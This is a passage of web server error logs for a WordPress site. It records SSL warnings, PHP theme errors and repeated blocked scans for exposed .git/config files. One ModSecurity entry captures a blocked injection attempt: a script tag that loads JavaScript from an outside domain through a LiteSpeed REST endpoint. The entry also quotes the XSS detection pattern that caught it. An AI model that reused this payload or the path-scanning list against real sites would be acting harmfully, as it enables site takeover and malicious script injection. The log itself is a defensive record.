ID which matches the server name [Fri Nov 08 03:12:44.543943 2024] [ssl:warn] [pid 1809:tid 139656466831232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 08 03:12:46.854084 2024] [ssl:warn] [pid 2227:tid 140426111723392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 08 03:12:47.061751 2024] [ssl:warn] [pid 2228:tid 140426111723392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 08 05:13:59.714355 2024] [authz_core:error] [pid 2247:tid 140425826395904] [client 188.166.108.93:60132] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/08 05:14:04 [error] 2209#2209: *883056 access forbidden by rule, client: 188.166.108.93, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Nov 08 10:46:34.247954 2024] [authz_core:error] [pid 11425:tid 140425658541824] [client 206.81.12.187:42896] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/08 10:46:38 [error] 2208#2208: *889992 access forbidden by rule, client: 206.81.12.187, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Nov 08 18:15:55.151318 2024] [:error] [pid 2247:tid 140425658541824] [client 62.146.228.246:50566] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/zerif-lite/404.php:7 [Fri Nov 08 18:15:55.151448 2024] [:error] [pid 2247:tid 140425658541824] [client 62.146.228.246:50566] Stack trace: [Fri Nov 08 18:15:55.151465 2024] [:error] [pid 2247:tid 140425658541824] [client 62.146.228.246:50566] #0 {main} [Fri Nov 08 18:15:55.151546 2024] [:error] [pid 2247:tid 140425658541824] [client 62.146.228.246:50566] thrown in /home/investig/public_html/wp-content/themes/zerif-lite/404.php on line 7 [Fri Nov 08 18:15:56.866882 2024] [:error] [pid 2808:tid 140425809610496] [client 80.85.85.94:50574] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/zerif-lite/404.php:7 [Fri Nov 08 18:15:56.866985 2024] [:error] [pid 2808:tid 140425809610496] [client 80.85.85.94:50574] Stack trace: [Fri Nov 08 18:15:56.867002 2024] [:error] [pid 2808:tid 140425809610496] [client 80.85.85.94:50574] #0 {main} [Fri Nov 08 18:15:56.867122 2024] [:error] [pid 2808:tid 140425809610496] [client 80.85.85.94:50574] thrown in /home/investig/public_html/wp-content/themes/zerif-lite/404.php on line 7 2024/11/09 00:28:46 [error] 2209#2209: *897534 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Nov 09 03:07:48.215219 2024] [ssl:warn] [pid 2357:tid 140324087191424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 09 03:07:48.454380 2024] [ssl:warn] [pid 2358:tid 140324087191424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 09 03:07:49.123344 2024] [ssl:warn] [pid 2358:tid 140324087191424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 09 03:07:51.645421 2024] [ssl:warn] [pid 2358:tid 140324087191424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 09 03:07:54.015022 2024] [ssl:warn] [pid 2782:tid 139968408975232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 09 03:07:54.236726 2024] [ssl:warn] [pid 2783:tid 139968408975232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 09 03:30:40.335851 2024] [:error] [pid 2800:tid 139968143943424] [client 179.43.191.19:58920] [client 179.43.191.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://wplicense.org/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://wplicense.org/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Zy8dsHRArBLr6kuKwvj7MgAAAAE"], referer: https://investigacionperu.com 2024/11/09 09:57:33 [error] 2761#2761: *905427 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sat Nov 09 10:31:39.206947 2024] [autoindex:error] [pid 2802:tid 139968018052864] [client 74.225.242.191:42286] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/11/09 13:53:09 [error] 2761#2761: *909024 access forbidden by rule, client: 45.148.10.206, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/11/09 16:37:31 [error] 2760#2760: *910948 access forbidden by rule, client: 45.148.10.206, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sat Nov 09 19:03:27.244496 2024] [ssl:warn] [pid 2783:tid 139968408975232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 10 00:57:06.209298 2024] [:error] [pid 30766:tid 139967976089344] [client 51.79.248.237:60020] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/zerif-lite/404.php:7 [Sun Nov 10 00:57:06.209408 2024] [:error] [pid 30766:tid 139967976089344] [client 51.79.248.237:60020] Stack trace: [Sun Nov 10 00:57:06.209432 2024] [:error] [pid 30766:tid 139967976089344] [client 51.79.248.237:60020] #0 {main} [Sun Nov 10 00:57:06.209532 2024] [:error] [pid 30766:tid 139967976089344] [client 51.79.248.237:60020] thrown in /home/investig/public_html/wp-content/themes/zerif-lite/404.php on line 7 [Sun Nov 10 03:29:47.881286 2024] [ssl:warn] [pid 14540:tid 140158104287104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 10 03:29:48.222634 2024] [ssl:warn] [pid 14541:tid 140158104287104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 10 03:29:48.792401 2024] [ssl:warn] [pid 14541:tid 140158104287104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 10 03:29:51.762557 2024] [ssl:warn] [pid 14541:tid 140158104287104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 10 03:29:54.149019 2024] [ssl:warn] [pid 14955:tid 140570311325568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 10 03:29:54.385567 2024] [ssl:warn] [pid 14956:tid 140570311325568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/11/10 07:32:02 [error] 14840#14840: *922352 access forbidden by rule, client: 45.148.10.206, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sun Nov 10 11:53:33.101001 2024] [authz_core:error] [pid 14978:tid 140570001381120] [client 138.68.82.23:43732] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/10 11:53:37 [error] 14839#14839: *925833 access forbidden by rule, client: 138.68.82.23, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 12:08:48 [error] 14840#14840: *926332 access forbidden by rule, client: 45.148.10.206, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sun Nov 10 13:58:23.024105 2024] [authz_core:error] [pid 20580:tid 140569984595712] [client 167.99.210.137:47126] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/10 13:58:28 [error] 14840#14840: *929384 access forbidden by rule, client: 167.99.210.137, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/11/10 14:45:35 [error] 14839#14839: *929983 access forbidden by rule, client: 45.148.10.206, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sun Nov 10 15:11:13.337294 2024] [autoindex:error] [pid 20578:tid 140570034951936] [client 20.92.249.70:48510] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Nov 10 18:22:37.000438 2024] [autoindex:error] [pid 20506:tid 140569942632192] [client 87.120.112.131:51352] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 10 18:23:29.030915 2024] [autoindex:error] [pid 15852:tid 140570001381120] [client 87.120.112.131:51370] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 10 20:08:42.546361 2024] [autoindex:error] [pid 20581:tid 140569917454080] [client 139.59.24.124:52602] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/11/10 22:57:12 [error] 14839#14839: *934366 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /media../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14840#14840: *934362 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /backend/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14840#14840: *934363 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /templates/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14840#14840: *934364 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /layout/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14840#14840: *934365 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /scripts/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14839#14839: *934367 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /template/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14839#14839: *934368 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /uploads/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14840#14840: *934369 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /files/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14839#14839: *934370 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /assets../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14840#14840: *934373 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /media/uploads/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14840#14840: *934374 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /css../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14839#14839: *934371 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /modules/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14839#14839: *934372 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14840#14840: *934375 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /static../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14840#14840: *934376 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /source/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14840#14840: *934377 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /vendor/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14839#14839: *934378 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /resources/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14840#14840: *934379 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /themes/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14840#14840: *934381 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /events../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14840#14840: *934380 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /js/libs/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14839#14839: *934383 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /images../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14839#14839: *934384 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /src/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14839#14839: *934385 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14839#14839: *934386 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /config/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14840#14840: *934382 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /content../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14839#14839: *934387 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /panel/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14839#14839: *934388 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /lib../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14839#14839: *934389 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /img../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14840#14840: *934391 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /js../.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14839#14839: *934390 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /views/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14839#14839: *934392 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /plugins/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:12 [error] 14840#14840: *934393 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:22 [error] 14840#14840: *934396 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /public/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:22 [error] 14839#14839: *934397 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /wp-content/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:22 [error] 14839#14839: *934398 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /lib/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:22 [error] 14840#14840: *934400 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /database/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:22 [error] 14839#14839: *934399 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /shared/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:22 [error] 14840#14840: *934401 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /extensions/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:22 [error] 14839#14839: *934402 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /data/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:22 [error] 14840#14840: *934403 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /node_modules/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:22 [error] 14839#14839: *934404 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /drupal/sites/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:22 [error] 14840#14840: *934405 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /documentation/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:22 [error] 14839#14839: *934406 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /docs/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:22 [error] 14840#14840: *934407 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /bower_components/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/10 22:57:22 [error] 14839#14839: *934408 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /prestashop/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/11 01:44:07 [error] 14839#14839: *936918 access forbidden by rule, client: 103.102.230.7, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Mon Nov 11 03:29:46.135401 2024] [ssl:warn] [pid 12013:tid 140043648575360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 11 03:29:46.432491 2024] [ssl:warn] [pid 12014:tid 140043648575360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 11 03:29:47.159131 2024] [ssl:warn] [pid 12014:tid 140043648575360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 11 03:29:50.065289 2024] [ssl:warn] [pid 12014:tid 140043648575360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 11 03:29:52.518103 2024] [ssl:warn] [pid 12434:tid 140610370176896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 11 03:29:52.792082 2024] [ssl:warn] [pid 12435:tid 140610370176896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/11/11 07:50:49 [error] 12415#12415: *940978 access forbidden by rule, client: 103.102.230.7, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Nov 11 10:13:29.931580 2024] [autoindex:error] [pid 13028:tid 140610082158336] [client 20.92.249.70:39106] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/11/11 10:24:22 [error] 12415#12415: *942583 access forbidden by rule, client: 103.102.230.7, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Nov 11 11:25:27.139638 2024] [ssl:warn] [pid 12435:tid 140610370176896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 11 11:25:27.945310 2024] [ssl:warn] [pid 12435:tid 140610370176896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 11 11:29:04.358603 2024] [ssl:warn] [pid 12435:tid 140610370176896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 11 11:29:05.230786 2024] [ssl:warn] [pid 12435:tid 140610370176896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 11 21:18:41.133762 2024] [autoindex:error] [pid 14575:tid 140609981445888] [client 4.213.90.193:59610] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Nov 12 03:30:23.296786 2024] [ssl:warn] [pid 6726:tid 140070960252800] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 12 03:30:23.523166 2024] [ssl:warn] [pid 6727:tid 140070960252800] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 12 03:30:24.243911 2024] [ssl:warn] [pid 6727:tid 140070960252800] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 12 03:30:26.586003 2024] [ssl:warn] [pid 6727:tid 140070960252800] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 12 03:30:29.058782 2024] [ssl:warn] [pid 7146:tid 140627104139136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 12 03:30:29.444704 2024] [ssl:warn] [pid 7147:tid 140627104139136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 12 04:39:28.313851 2024] [autoindex:error] [pid 7168:tid 140626699945728] [client 20.92.249.70:40824] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Nov 12 10:15:36.794542 2024] [authz_core:error] [pid 8553:tid 140626708338432] [client 142.93.143.8:58824] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/12 10:15:42 [error] 7127#7127: *969163 access forbidden by rule, client: 142.93.143.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Nov 12 18:06:46.225039 2024] [autoindex:error] [pid 7170:tid 140626783872768] [client 146.70.192.108:41680] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/edit-site/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:06:46.448215 2024] [autoindex:error] [pid 7168:tid 140626674767616] [client 146.70.192.108:41682] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/components/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:06:46.673138 2024] [autoindex:error] [pid 7169:tid 140626683160320] [client 146.70.192.108:41684] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/editor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:06:46.896286 2024] [autoindex:error] [pid 7169:tid 140626666374912] [client 146.70.192.108:41686] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/block-library/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:06:49.821901 2024] [autoindex:error] [pid 8553:tid 140626666374912] [client 146.70.192.108:41694] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:06:50.044831 2024] [autoindex:error] [pid 8553:tid 140626817443584] [client 146.70.192.108:41696] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:06:50.268371 2024] [autoindex:error] [pid 7170:tid 140626817443584] [client 146.70.192.108:41698] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:06:50.499626 2024] [autoindex:error] [pid 7168:tid 140626921391872] [client 146.70.192.108:41700] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:06:54.894350 2024] [autoindex:error] [pid 7170:tid 140626666374912] [client 146.70.192.108:41710] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 12 18:06:55.130269 2024] [autoindex:error] [pid 7170:tid 140626800658176] [client 146.70.192.108:41712] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex 